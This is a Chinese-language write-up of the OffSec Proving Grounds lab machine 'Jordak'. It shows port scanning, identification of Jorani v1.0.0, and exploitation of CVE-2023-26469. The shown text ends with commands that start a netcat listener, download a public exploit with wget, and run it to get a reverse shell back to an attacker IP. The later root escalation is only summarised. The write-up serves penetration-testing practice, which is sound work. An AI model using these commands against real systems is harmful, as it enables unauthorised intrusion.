OSCP Jordak Write-up

本文最后更新于 2026年3月12日下午

一、靶场详情

靶场名称：

Jordak

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

Jorani 远程代码执行 –> jordak 用户权限 –> 用户旗帜

权限提升：

env sudo 权限 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.228.109 --min-rate=2000

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p22,80 -sCV 192.168.228.109

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境，开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 Jorani 远程代码执行漏洞（CVE-2023-26469）

访问靶机 HTTP 80 端口，网站首页为 Apache 默认界面。

通过部分路径资源泄漏的应用信息，可判断系统大概率部署了 Jorani 应用。

1 2	`http://192.168.228.109/docs/install/README.md http://192.168.228.109/phpunit.xml`

在 URL 资源路径输入任意字符，会自动跳转至 Jorani 登录界面，在页面右下角可得到应用版本信息：Jorani v1.0.0。

有时靶机会泄漏很多敏感信息，当信息量很大时就需要逐个排查，此时更需要明确思路，尽可能的确定靶机运行的服务和版本信息，通过这些信息再去枚举漏洞，盲目的检索只会消耗时间和精力。

搜索引擎检索 Jorani v1.0.0 exploit，发现历史存在远程代码执行漏洞（CVE-2023-26469）。

参考链接：

1 2	`https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-26469 https://github.com/samipmainali/Jorani-Reverse-Shell-v1.0.0/blob/main/Jorani_V1.0.0_exploit.py`

注意： 关于该漏洞互联网存在很多 EXP，部分 EXP 会执行失败，由于我们已经明确当前应用版本存在远程代码执行漏洞，不要放弃，多尝试不同的 EXP，甚至需要检索漏洞攻击原理修复 EXP，或许因为某个参数或路径发生了改变导致执行失败。

在 kali 监听 80 端口，下载并执行漏洞 EXP，获取到系统 jordak 用户权限。

1
2
3

nc -lvnp 80
wget https://raw.githubusercontent.com/samipmainali/Jorani-Reverse-Shell-v1.0.0/refs/heads/main/Jorani_V1.0.0_exploit.py
python3 Jorani_V1.0.0_exploit.py -u http://192.168.228.109 -i 192.168.45.170 -p 80